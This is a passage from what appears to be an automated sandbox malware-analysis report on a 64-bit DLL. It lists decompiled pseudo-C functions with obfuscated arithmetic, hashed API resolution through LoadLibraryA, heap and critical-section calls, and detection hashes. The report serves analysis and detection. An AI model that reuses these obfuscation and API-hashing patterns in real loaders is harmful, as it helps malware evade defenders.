                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FFC130EAD58
                                  • Part of subcall function 00007FFC130E9AC0: GetProcessHeap.KERNEL32(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B22
                                  • Part of subcall function 00007FFC130E9AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocateObjectProcessSingleWait
                                • String ID: 8
                                • API String ID: 4287835514-406019892
                                • Opcode ID: 8cafa0d41ea4863b1c047ae8c992af8925c9c6a1007ade65a18b741fcc31d67f
                                • Instruction ID: d47ef9f54ede6cd88deb67ca670bec40e913a87a435673d09aef5d168ee4430d
                                • Opcode Fuzzy Hash: 8cafa0d41ea4863b1c047ae8c992af8925c9c6a1007ade65a18b741fcc31d67f
                                • Instruction Fuzzy Hash: E3D188736086D48BD721CF14E484BDABBA8F788798F040139DB8957B58DB38EA95CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 2757213858-0
                                • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction ID: 5f73246556db8f551803a434a2abb52e996455873a44691966bc438cbf73c2a4
                                • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction Fuzzy Hash: B941D272609F9987DB58CB14E5807E9B7A4F784B88F084235DB8D57B44EF38D6A5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
                                
                                				_a16 = __rbx;
                                				_a24 = __rbp;
                                				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
                                				r8d = r8d - 0x27b3;
                                				if ( *((intOrPtr*)(__rdx + 0x158)) != r8d) goto 0x130e9b07;
                                				return 0;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction ID: 416bdeb696cee8df0479d703f5e23b7e69f67396b7a46ea3df2999aaeb1c8561
                                • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction Fuzzy Hash: CE118672719B9086EA49CB62E8842AEA3A0F78CBD4F584135DF4D53B49CF38D5A08700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: b049db5660b9aacd0cd17634e525d4f8cbccc83e5e1fd047ea57d6b67e4dd2ee
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 7E519E72A04BA0D7D764CF05F84AB9EB7A8F784B94F514115EF8943B59DB39C8A0CB08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 29%
                                			E00000201201640C5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                                				long long* _t32;
                                				long long* _t35;
                                				long long _t41;
                                				void* _t56;
                                				void* _t57;
                                
                                				_t32 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a32 = __rsi;
                                				_t48 =  *0x640cd458;
                                				E00000201201640C908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t32 == 0) goto 0x640c6006;
                                				LoadLibraryA(??); // executed
                                				_t35 = _t32;
                                				goto 0x640c6008;
                                				if (_t35 == 0) goto 0x640c6048;
                                				if (E00000201201640C40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0x640c602e;
                                				_t41 = _a24;
                                				 *_t41 = _t35;
                                				 *__rdx = _t41;
                                				goto 0x640c6066;
                                				E00000201201640C908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t32 == 0) goto 0x640c6066;
                                				 *_t32();
                                				goto 0x640c6066;
                                				E00000201201640C908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                                				if (_t32 == 0) goto 0x640c6061;
                                				 *_t32();
                                				goto 0x640c6066;
                                				return 0x7f;
                                			}

                                APIs
                                  • Part of subcall function 00000201640C908C: SetLastError.KERNEL32 ref: 00000201640C90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00000201640C8947,?,?,?,?,?,00000201640C9D9C), ref: 00000201640C5FFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                                • Instruction ID: b412a4fdd3237899fe9d94b89ef441d6ff93a59f86aa704c517f45b494d6ba40
                                • Opcode Fuzzy Hash: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                                • Instruction Fuzzy Hash: 7A116322315760C7EA309B51F9463AA5264A7C8BC0F3C5831BF4E5774FDE3AD5618314
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00007FFC7FFC130EE154(intOrPtr* __rax, void* __rcx) {
                                				void* __rbx;
                                
                                				if (__rcx - 0xffffffe0 > 0) goto 0x130ee19f;
                                				_t16 =  ==  ? __rax : __rcx;
                                				goto 0x130ee186;
                                				if (E00007FFC7FFC130F1374() == 0) goto 0x130ee19f;
                                				if (E00007FFC7FFC130F0F5C(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x130ee19f;
                                				RtlAllocateHeap(??, ??, ??); // executed
                                				if (__rax == 0) goto 0x130ee171;
                                				goto 0x130ee1ac;
                                				E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0xc;
                                				return 0;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                                • Instruction ID: 607eead2e2132e49ea425e53871ef1ce691674a1d0f86104ccdfee5b2233db53
                                • Opcode Fuzzy Hash: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                                • Instruction Fuzzy Hash: 2EF08238F0DA6E45FE5467A55D1027591D04F897B8F180670DD2E752C2DE1CE8A0C130
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                                				void* __rbx;
                                				void* _t2;
                                				long long* _t15;
                                				long long _t16;
                                				void* _t20;
                                				long long _t21;
                                				long long _t22;
                                				void* _t24;
                                				void* _t25;
                                
                                				_t17 = __rcx;
                                				if (__edx == 0) goto 0x640c697b;
                                				if (__edx != 1) goto 0x640c6998;
                                				_t20 = __r8; // executed
                                				_t2 = E00000201201640C4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                                				if (_t2 == 0) goto 0x640c6998;
                                				goto 0x640c6998;
                                				E00000201201640C6CE4(_t15, _t16, _t17, _t20, _t22);
                                				if ( *0x640cd458 == 0) goto 0x640c6998;
                                				HeapDestroy(??); // executed
                                				return 0;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: b2ee4f9dc53543178b1ae4f8cdf7856bad762dfa7fd39a985ad539d57471f721
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: A2E06510310360C3FE746A228D9B3F9025CEB80740F286C3CAF0A4628FCA3BD8A58208
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E00007FFC7FFC130EAE80(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r12;
                                				void* __r14;
                                				void* __r15;
                                				signed int _t158;
                                				signed int _t159;
                                				signed int _t160;
                                				intOrPtr _t177;
                                				intOrPtr _t195;
                                				signed int _t203;
                                				signed int _t212;
                                				signed int _t224;
                                				signed int _t227;
                                				void* _t234;
                                				long long _t238;
                                				signed int* _t239;
                                				long long _t242;
                                				struct _CRITICAL_SECTION* _t256;
                                				void* _t259;
                                				void* _t261;
                                				void* _t263;
                                				void* _t264;
                                				void* _t274;
                                				void* _t278;
                                				void* _t280;
                                				signed int _t281;
                                				signed int _t282;
                                				signed long long _t283;
                                				void* _t285;
                                				void* _t287;
                                
                                				_t274 = __r10;
                                				_t266 = __r8;
                                				_t241 = __rcx;
                                				_t237 = __rbx;
                                				_t234 = __rax;
                                				 *((long long*)(_t263 + 0x18)) = __rbx;
                                				_push(_t261);
                                				_push(_t259);
                                				_t264 = _t263 - 0x90;
                                				r8d =  *(_t264 + 0x120);
                                				r14d = __rdx + 0x566;
                                				_t195 = __r9 - 0x23f6;
                                				r11d =  *(_t264 + 0xf8);
                                				_t7 = _t241 - 0xde7; // 0x27ae
                                				r11d = r11d + 0x1669;
                                				 *(_t264 + 0xd0) = r14d;
                                				r10d = __r8 - 0x1137;
                                				 *((intOrPtr*)(_t264 + 0xe8)) = _t195;
                                				_t224 = __rax + 0x61f;
                                				 *(_t264 + 0x7c) = r10d;
                                				r12d = __rax - 0x1408;
                                				 *(_t264 + 0x70) = _t224;
                                				 *(_t264 + 0xd8) = r12d;
                                				 *(_t264 + 0x74) = __r8 - 0x18b7;
                                				_t177 = __r8 - 0x64c;
                                				r9d = __r8 - 0x4af;
                                				 *((intOrPtr*)(_t264 + 0x80)) = _t177;
                                				 *(_t264 + 0x118) =  *(_t264 + 0x108) + 0xffffe9cc;
                                				 *(_t264 + 0x78) = r9d;
                                				 *(_t264 + 0x120) =  *(_t264 + 0x110) + 0xffffdefd;
                                				 *(_t264 + 0x110) = r11d;
                                				 *(_t264 + 0x108) = _t7;
                                				if (_t195 - _t278 + 0xd1 > 0) goto 0x130eb204;
                                				_t281 =  *((intOrPtr*)(_t264 + 0x128));
                                				r15d = __r11 - 0x15b;
                                				 *(_t264 + 0x38) = r15d;
                                				 *(_t264 + 0x30) = __r9 - 0x150e;
                                				r14d = __rdx + 0x3666;
                                				 *(_t264 + 0x28) = __r9 + 0x22c;
                                				 *(_t264 + 0x20) = r15d;
                                				_t158 = E00007FFC7FFC130E8BF0(r14d, __r9 + 0x15b, __rax, __rbx, __rcx, __rdx, __r8, _t281, __r11, _t287, _t285, _t280, _t278);
                                				_t40 = _t259 + 0x1033; // 0x37e1
                                				r10d = _t40;
                                				r11d = _t278 + 0x25a;
                                				 *(_t264 + 0x50) = r10d;
                                				 *(_t264 + 0x48) = _t281;
                                				 *(_t264 + 0x40) = r11d;
                                				 *(_t264 + 0x38) = _t177 + 0x7bc;
                                				r9d = __rdx + 0x10a3;
                                				 *(_t264 + 0x30) = __rcx + 0x37e1;
                                				r8d = __rcx + 0x3a59;
                                				 *(_t264 + 0x28) = __rdx + 0x77c;
                                				 *(_t264 + 0x20) = _t224 + 0xffffe5d9;
                                				 *(_t264 + 0x120) = _t158;
                                				_t159 = E00007FFC7FFC130FCDF0( *(_t264 + 0x110) + 0x4c4, __rax, _t237, __rcx, __rdx, __r8, __r11, _t285);
                                				r12d = r12d + 0x18b7;
                                				r9d =  *(_t264 + 0x78);
                                				r10d =  *(_t264 + 0x70);
                                				r9d = r9d + 0xffffebf8;
                                				r10d = r10d + 0xffffed59;
                                				r8d =  *(_t264 + 0x108);
                                				r8d = r8d + 0x927;
                                				 *(_t264 + 0x50) = r14d;
                                				 *(_t264 + 0x48) = _t159;
                                				r13d = _t159;
                                				 *(_t264 + 0x40) =  *(_t264 + 0x120) + 0xfffff40f;
                                				 *(_t264 + 0x38) = r9d;
                                				r11d = _t256 + 0x2598;
                                				 *(_t264 + 0x30) = r10d;
                                				r9d = r12d;
                                				 *(_t264 + 0x28) = r11d;
                                				 *(_t264 + 0x20) =  *(_t264 + 0xd0) + 0x10ce;
                                				_t238 =  *((intOrPtr*)(_t264 + 0x128));
                                				_t160 = E00007FFC7FFC130E2A70(_t238, __rcx, _t238, __r8, _t274); // executed
                                				_t242 =  *((intOrPtr*)(_t238 + 0x23c));
                                				r11d = _t256 + 0x27ae;
                                				_t75 = _t281 + 0xea7; // 0xea7
                                				r10d = _t75;
                                				r14d =  *(_t264 + 0xd0);
                                				r15d = _t160;
                                				r9d =  *(_t264 + 0x120);
                                				_t78 = _t234 + 0x1669; // 0x1669
                                				 *((long long*)(_t238 + 0x158)) = _t242;
                                				_t80 = _t234 + 0x19bd; // 0x19bd
                                				r8d = _t80;
                                				_t227 =  *((intOrPtr*)(_t264 + 0x80)) + 0xffffed95;
                                				 *((intOrPtr*)(_t264 + 0x68)) = _t78;
                                				r14d = r14d + 0x14c1;
                                				r9d = r9d + 0x2b1;
                                				 *(_t264 + 0x60) = r12d;
                                				 *(_t264 + 0x58) = r8d;
                                				r8d = r13d;
                                				_t282 =  *((intOrPtr*)(_t264 + 0x128));
                                				 *(_t264 + 0x50) = r10d;
                                				 *(_t264 + 0x48) = r11d;
                                				 *(_t264 + 0x40) =  *(_t264 + 0x118) + 0x77c;
                                				 *(_t264 + 0x38) = _t234 + 0x1a27;
                                				 *(_t264 + 0x30) = _t234 + 0x126b;
                                				 *(_t264 + 0x28) = _t227;
                                				 *(_t264 + 0x20) = r14d;
                                				E00007FFC7FFC130E32C0(_t238, _t242, _t282, _t261, _t266, _t287);
                                				_t98 = _t287 + 0x360; // 0x360
                                				r11d =  *(_t264 + 0xd8);
                                				r9d =  *(_t264 + 0x120);
                                				r11d = r11d + 0x16b5;
                                				r10d = _t242 - 0x886;
                                				 *(_t264 + 0x48) =  *(_t264 + 0x118) + 0xd1;
                                				r8d = _t242 - 0x6af;
                                				 *(_t264 + 0x40) = r10d;
                                				_t203 = _t242 + 0x12a7;
                                				 *(_t264 + 0x38) = r11d;
                                				_t212 =  *(_t264 + 0x108) + 0x113b;
                                				 *(_t264 + 0x30) = _t282;
                                				r9d = r9d + 0x8d0;
                                				 *(_t264 + 0x28) = _t98;
                                				 *(_t264 + 0x20) = _t212;
                                				E00007FFC7FFC130FD230(_t203, _t234, _t238, _t242, _t282);
                                				goto 0x130eb37e;
                                				_t239 =  *((intOrPtr*)(_t264 + 0x128));
                                				if (_t239[0x24] - _t234 >= 0) goto 0x130eb306;
                                				_t283 = r14d;
                                				if (_t239[0x62] - (_t239[0x50] - 0x23f6) * _t283 <= 0) goto 0x130eb306;
                                				r15d = _t203;
                                				r12d = r11d;
                                				r12d = r12d *  *(_t264 + 0x120);
                                				r15d = r15d ^ r14d;
                                				r14d =  *(_t264 + 0x118);
                                				r8d = r12d;
                                				r9d = _t239[0x48];
                                				r9d = r9d & 0x00003595;
                                				r9d = r9d + _t239[0x50];
                                				 *(_t264 + 0x38) = (_t239[0x70] & r14d) * r9d;
                                				 *(_t264 + 0x30) = (_t239[0x36] | _t227) + _t239[0x62];
                                				 *(_t264 + 0x28) = _t239;
                                				 *(_t264 + 0x20) = r15d;
                                				E00007FFC7FFC131009D0(_t239[0x62] ^  *_t239, (r14d |  *(_t264 + 0x74)) & 0x00003666, _t239, (_t239[0x50] - 0x23f6) * _t283, _t282, _t239[0x62], _t259, _t261, _t266, _t281, __r11, _t278, _t285, _t287);
                                				r9d =  *(_t264 + 0x78);
                                				if (_t212 + 4 - (_t239[0x50] - 0x23f6) * _t283 > 0) goto 0x130eb270;
                                				r14d =  *(_t264 + 0xd0);
                                				r12d =  *(_t264 + 0xd8);
                                				r10d =  *(_t264 + 0x7c);
                                				r11d =  *(_t264 + 0x110);
                                				r12d = r12d & r10d;
                                				if (r14d - r12d > 0) goto 0x130eb378;
                                				 *(_t264 + 0x28) = _t239[0x2c] * _t239[0x12];
                                				 *_t239 =  *_t239 | _t239[0x62] - r14d;
                                				 *(_t264 + 0x20) = __r11 - 0x23f6;
                                				InitializeCriticalSection(_t256);
                                				return _t261 - 0x12ab;
                                			}




































                                APIs
                                • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FFC130EB372
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID:
                                • API String ID: 32694325-0
                                • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction ID: d13d3fd60ab15f69874901ae012e89e4313c13ae80d127c0e99757a7c7504c2c
                                • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction Fuzzy Hash: 1CD17D736086C48BC325CF14E440BDEBBA4F788798F144126EB8967B58DB38EA55CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E00007FFC7FFC130EA4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                                				void* __r12;
                                				void* __r13;
                                				void* __r14;
                                				signed int _t153;
                                				intOrPtr _t185;
                                				signed int _t194;
                                				void* _t204;
                                				signed int _t215;
                                				intOrPtr _t216;
                                				long long _t221;
                                				intOrPtr _t222;
                                				void* _t232;
                                				long long _t236;
                                				void* _t239;
                                				void* _t240;
                                				void* _t243;
                                				struct _CRITICAL_SECTION* _t245;
                                				void* _t247;
                                				void* _t249;
                                				long long _t250;
                                				signed int _t251;
                                				void* _t253;
                                
                                				_t243 = __r9;
                                				_t231 = __rdx;
                                				_t204 = __rax;
                                				 *((long long*)(_t239 + 0x10)) = __rbx;
                                				 *((long long*)(_t239 + 0x18)) = _t236;
                                				 *((long long*)(_t239 + 0x20)) = __rsi;
                                				_push(_t232);
                                				_t240 = _t239 - 0x90;
                                				r13d =  *(_t240 + 0x110);
                                				r11d = __rcx + 0x7bc;
                                				r14d =  *(_t240 + 0x120);
                                				r8d =  *(_t240 + 0xe0);
                                				r9d = _t247 + 0x1137;
                                				r15d = _t247 - 0x21a;
                                				r12d =  *(_t240 + 0xf8);
                                				 *(_t240 + 0x80) = r15d;
                                				 *(_t240 + 0x120) =  *(_t240 + 0xe8) + 0x40c;
                                				r10d = _t247 + 0xf35;
                                				 *(_t240 + 0x110) = r10d;
                                				 *(_t240 + 0xc0) = r11d;
                                				r12d = r12d + 0xffffefef;
                                				if (__r8 - 0x40c - __r9 - 0x17e6 < 0) goto 0x130ea883;
                                				if (r12d - __rcx - 0x1157 <= 0) goto 0x130ea789;
                                				 *((intOrPtr*)(_t240 + 0x60)) = __rdx + 0x2103;
                                				r10d = _t232 + 0x38e9;
                                				_t250 =  *((intOrPtr*)(_t240 + 0x108));
                                				 *((long long*)(_t240 + 0x58)) = _t250;
                                				r11d = _t253 + 0x114f;
                                				 *(_t240 + 0x50) = r10d;
                                				r9d = __r8 - 0xde7;
                                				 *(_t240 + 0x48) = r11d;
                                				r8d = __rdx + 0x343a;
                                				 *(_t240 + 0x40) = _t236 + 0x37e1;
                                				 *(_t240 + 0x38) = _t249 - 0x30d5 + 0x27b2;
                                				 *(_t240 + 0x30) = _t236 + 0x2103;
                                				 *(_t240 + 0x28) = __rcx + 0x2b1;
                                				 *(_t240 + 0x20) = r13d;
                                				E00007FFC7FFC130E11F0(__rcx, __rdx, __rsi, _t236, __r8, _t245, _t247, _t250); // executed
                                				r9d =  *(_t240 + 0x110);
                                				r9d = r9d + 0xffffeeb1;
                                				 *((long long*)(_t250 + 0x158)) =  *((intOrPtr*)(_t250 + 0x350));
                                				_t49 = _t204 - 0x814; // -2068
                                				_t153 = _t49;
                                				_t51 = _t204 - 0x108; // -264
                                				r10d = _t51;
                                				_t53 = _t231 - 0x113b; // -4411
                                				_t185 = _t53;
                                				 *(_t240 + 0x78) = r10d;
                                				_t55 = _t231 - 0x4af; // -1199
                                				r8d = _t55;
                                				_t221 =  *((intOrPtr*)(_t250 + 0xe0)) + 0x3595;
                                				_t194 =  *(_t240 + 0xe0) + 0x24c;
                                				 *((long long*)(_t250 + 0x58)) = _t221;
                                				r14d =  *(_t240 + 0xc0);
                                				r13d =  *(_t240 + 0xe8);
                                				r11d = _t221 - 0x202;
                                				 *(_t240 + 0x70) = r11d;
                                				 *(_t240 + 0x68) = _t153;
                                				r15d = _t221 - 0x113b;
                                				_t215 =  *((intOrPtr*)(_t240 + 0x108));
                                				r12d = _t221 - 0x760;
                                				 *((intOrPtr*)(_t240 + 0x60)) = _t204 - 0x1563;
                                				 *((intOrPtr*)(_t240 + 0x58)) = _t185;
                                				r14d = r14d + 0xffffe5d9;
                                				 *(_t240 + 0x50) = _t194;
                                				r13d = r13d + 0x2b1;
                                				 *(_t240 + 0x48) = r14d;
                                				 *(_t240 + 0x40) = r15d;
                                				 *(_t240 + 0x38) = _t215;
                                				 *(_t240 + 0x30) = r12d;
                                				 *(_t240 + 0x28) =  *(_t240 + 0x120) + 0xfffff21d;
                                				 *(_t240 + 0x20) = r13d;
                                				E00007FFC7FFC130FE7E0(_t221, __rdx, __r8, _t243, _t253, _t249, _t247);
                                				_t222 =  *((intOrPtr*)(_t215 + 0xd0));
                                				r15d =  *(_t240 + 0x80);
                                				 *((short*)(_t215 + 0xf8)) =  *(_t222 + 6) & 0x0000ffff;
                                				 *((long long*)(_t215 + 0x108)) = _t222 + 0x108;
                                				 *((intOrPtr*)(_t215 + 0x100)) =  *((intOrPtr*)(_t215 + 0x100)) + _t222 -  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x1a0)) + 0x100));
                                				goto 0x130ea93e;
                                				_t216 =  *((intOrPtr*)(_t240 + 0x108));
                                				if (r15d - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) < 0) goto 0x130ea93e;
                                				r14d = 0x228c;
                                				r10d = r10d ^ 0x000038e9;
                                				 *(_t240 + 0x110) = r10d;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r10d;
                                				r8d = r8d *  *(_t216 + 0x120);
                                				 *(_t240 + 0x20) = _t194 * r9d;
                                				r9d = ( *(_t216 + 0x228) & 0x0000ffff) * (r8w & 0xffffffff) & 0x0000ffff;
                                				r9d = r9d * (r11w & 0xffffffff);
                                				EnterCriticalSection(_t245);
                                				r8d =  *(_t240 + 0xe0);
                                				r10d =  *(_t240 + 0x110);
                                				r11d =  *(_t240 + 0xc0);
                                				 *(_t216 + 0xe0) =  *(_t216 + 0xe0) | _t185 - (r12d -  *((intOrPtr*)(_t216 + 0x110)) & r15d) ^  *(_t216 + 0x1f8) ^  *(_t216 + 0x1c0);
                                				if (r15d + 1 - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) >= 0) goto 0x130ea7d0;
                                				goto 0x130ea93e;
                                				_t251 =  *((intOrPtr*)(_t240 + 0x108));
                                				if (r15d -  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153 <= 0) goto 0x130ea93e;
                                				r11d =  *(_t251 + 0x120);
                                				r11d = r11d | r8d;
                                				r10d =  *(_t251 + 0x78);
                                				r9d =  *_t251;
                                				r10d = r10d +  *((intOrPtr*)(_t251 + 0x18));
                                				r9d = r9d - ( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8));
                                				r8d =  *(_t240 + 0xc0);
                                				r10d = r10d | 0x00003666;
                                				 *(_t240 + 0x48) =  *(_t251 + 0x48) * 0x36e7;
                                				 *(_t240 + 0x40) = ( *(_t251 + 0x100) | 0x00003666) ^  *(_t251 + 0x1b0);
                                				 *(_t240 + 0x38) = r11d;
                                				r12d = r12d * (__r8 - 0x40c);
                                				 *(_t240 + 0x30) = _t251;
                                				 *(_t240 + 0x28) =  *(_t251 + 0xf0) & r8d;
                                				 *(_t240 + 0x20) = r10d;
                                				r8d = r8d + r12d;
